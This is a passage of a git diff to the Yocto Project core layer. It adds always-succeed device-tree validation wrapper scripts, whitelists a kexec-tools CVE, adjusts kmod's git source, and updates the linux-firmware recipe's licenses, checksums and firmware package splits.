+# exec dt-mk-schema.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
new file mode 100644
index 0000000000..8a4710a7ed
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
new file mode 100644
index 0000000000..c869274d09
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
+DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
+HOMEPAGE = "https://yoctoproject.org"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+SRC_URI = "file://dt-doc-validate \
+ file://dt-mk-schema \
+ file://dt-validate"
+
+do_install() {
+ install -d ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
+}
+
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 4f1af731d6..82d678e509 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Tools for managing Yocto Project style branched kernels"
+DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
+and configuration data. You can use these tools to make a single configuration \
+change, apply multiple patches, or work with your own kernel sources."
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
inherit native
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
index 871b36440f..206c6ccae7 100644
--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
export LDFLAGS = "-L${STAGING_LIBDIR}"
EXTRA_OECONF = " --with-zlib=yes"
+# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
+CVE_CHECK_WHITELIST += "CVE-2021-20269"
+
do_compile_prepend() {
# Remove the prepackaged config.h from the source tree as it overrides
# the same file generated by configure and placed in the build tree
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
# Lookout for PV bump too when SRCREV is changed
PV = "26"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
file://depmod-search.conf \
file://0001-build-Stop-using-dolt.patch \
file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
S = "${WORKDIR}/git"
-EXTRA_AUTORECONF += "--install --symlink"
EXTRA_OECONF +=" --enable-tools --with-zlib"
PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-Add 'install-ptest' rule.
-
-Signed-off-by: Tudor Florea <tudor.florea@enea.com>
-Upstream-Status: Pending
-
-diff -ruN a/Makefile.am b/Makefile.am
---- a/Makefile.am 2013-07-12 17:11:05.278331557 +0200
-+++ b/Makefile.am 2013-07-12 17:14:27.033788016 +0200
-@@ -204,6 +204,16 @@
-
- distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
-
-+install-ptest:
-+ @$(MKDIR_P) $(DESTDIR)/testsuite
-+ @for file in $(TESTSUITE); do \
-+ install $$file $(DESTDIR)/testsuite; \
-+ done;
-+ @sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
-+ @$(MKDIR_P) $(DESTDIR)/tools
-+ @cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
-+ @cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
-+
- # ------------------------------------------------------------------------------
- # custom release helpers
- # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 045f2647e0..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
SUMMARY = "Firmware files for use with Linux kernel"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
+that contains firmware binary blobs necessary for partial or full functionality \
+of certain hardware devices."
SECTION = "kernel"
LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
& Firmware-go7007 \
& Firmware-GPLv2 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-i915 \
& Firmware-ibt_firmware \
& Firmware-ice \
@@ -31,6 +34,7 @@ LICENSE = "\
& Firmware-iwlwifi_firmware \
& Firmware-IntcSST2 \
& Firmware-kaweth \
+ & Firmware-Lontium \
& Firmware-Marvell \
& Firmware-moxa \
& Firmware-myri10ge_firmware \
@@ -41,6 +45,7 @@ LICENSE = "\
& Firmware-phanfw \
& Firmware-qat \
& Firmware-qcom \
+ & Firmware-qcom-yamato \
& Firmware-qla1280 \
& Firmware-qla2xxx \
& Firmware-qualcommAthos_ar3k \
@@ -52,7 +57,6 @@ LICENSE = "\
& Firmware-rtlwifi_firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -67,8 +71,8 @@ LICENSE = "\
LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
- file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \
- file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \
+ file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
+ file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -86,14 +90,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
- file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
- file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \
+ file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
+ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \
file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \
@@ -104,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
- file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
+ file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
+ file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -117,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
- file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -126,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
- file://WHENCE;md5=daf28db5d6353de0a886f08106cffa22 \
+ file://WHENCE;md5=${WHENCE_CHKSUM} \
"
+# WHENCE checksum is defined separately to ease overriding it if
+# class-devupstream is selected.
+WHENCE_CHKSUM = "a344e6c28970fc7daafa81c10247aeb6"
# These are not common licenses, set NO_GENERIC_LICENSE for them
# so that the license files will be copied from fetched source
@@ -153,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
-NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -161,6 +167,7 @@ NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2"
NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x"
NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware"
NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth"
+NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium"
NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell"
NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek"
NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa"
@@ -172,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
+NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -183,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
-NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -196,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
PE = "1"
-SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz"
+SRC_URI = "\
+ ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
+"
+
+BBCLASSEXTEND = "devupstream:target"
+SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
+# Pin this to the 20220509 release, override this in local.conf
+SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
-SRC_URI[sha256sum] = "bf586e0beb4c65f22bf0a79811f259aa0a5a7cc9f70eebecb260525b6914cef7"
+SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
inherit allarch
@@ -209,7 +223,8 @@ do_compile() {
}
do_install() {
- oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install
+ # install-nodedup avoids rdfind dependency
+ oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
}
@@ -222,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
${PN}-vt6656-license ${PN}-vt6656 \
+ ${PN}-rs9113 ${PN}-rs9116 \
${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
${PN}-rtl8168 \
+ ${PN}-rtl8822 \
${PN}-cypress-license \
${PN}-broadcom-license \
${PN}-bcm-0bb4-0306 \
@@ -261,7 +278,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-bcm43xx-hdr \
${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \
${PN}-gplv2-license ${PN}-carl9170 \
- ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-qca \
+ ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \
\
${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \
\
@@ -293,11 +310,22 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-nvidia-gpu \
${PN}-netronome-license ${PN}-netronome \
${PN}-qat ${PN}-qat-license \
- ${PN}-qcom-license \
+ ${PN}-qcom-license ${PN}-qcom-yamato-license \
${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
- ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \
- ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
+ ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
+ ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
+ ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
+ ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
+ ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
+ ${PN}-lt9611uxc ${PN}-lontium-license \
${PN}-whence-license \
${PN}-license \
"
@@ -340,7 +368,7 @@ FILES_${PN}-carl9170 = " \
RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
# For QualCommAthos
-LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k"
+LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -356,12 +384,17 @@ FILES_${PN}-ath10k = " \
${nonarch_base_libdir}/firmware/ath10k \
"
+FILES_${PN}-ath11k = " \
+ ${nonarch_base_libdir}/firmware/ath11k \
+"
+
FILES_${PN}-qca = " \
${nonarch_base_libdir}/firmware/qca \
"
-RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license"
+RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
+RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
# For ralink
@@ -381,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u = " \
- ${nonarch_base_libdir}/firmware/mt7601u.bin \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
"
RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -397,6 +430,12 @@ FILES_${PN}-radeon = " \
RDEPENDS_${PN}-radeon += "${PN}-radeon-license"
+# For lontium
+LICENSE_${PN}-lt9611uxc = "Firmware-Lontium"
+
+FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium"
+FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin"
+
# For marvell
LICENSE_${PN}-pcie8897 = "Firmware-Marvell"
LICENSE_${PN}-pcie8997 = "Firmware-Marvell"
@@ -477,6 +516,13 @@ FILES_${PN}-netronome = " \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/bpf \
+ ${nonarch_base_libdir}/firmware/netronome/flower \
+ ${nonarch_base_libdir}/firmware/netronome/nic \
+ ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
"
RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -501,6 +547,17 @@ FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia"
RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
+RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
+
+# For RSI RS911x WiFi
+LICENSE_${PN}-rs9113 = "WHENCE"
+LICENSE_${PN}-rs9116 = "WHENCE"
+
+FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
+FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
+
+RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
+RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
# For rtl
LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
@@ -509,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
+LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8168 = "WHENCE"
@@ -536,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
FILES_${PN}-rtl8168 = " \
${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
"
+FILES_${PN}-rtl8822 = " \
+ ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
+"
RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -543,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
+RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
# For ti-connectivity
@@ -602,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
-FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin"
+FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
+"
FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -611,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
"
FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
-FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*"
+FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
+"
FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
-FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin"
+FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
+"
FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
-FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin"
+FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
+"
FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
@@ -687,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
-FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*"
-FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*"
-FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*"
-FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin"
-FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*"
+FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
+FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
+FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
+FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
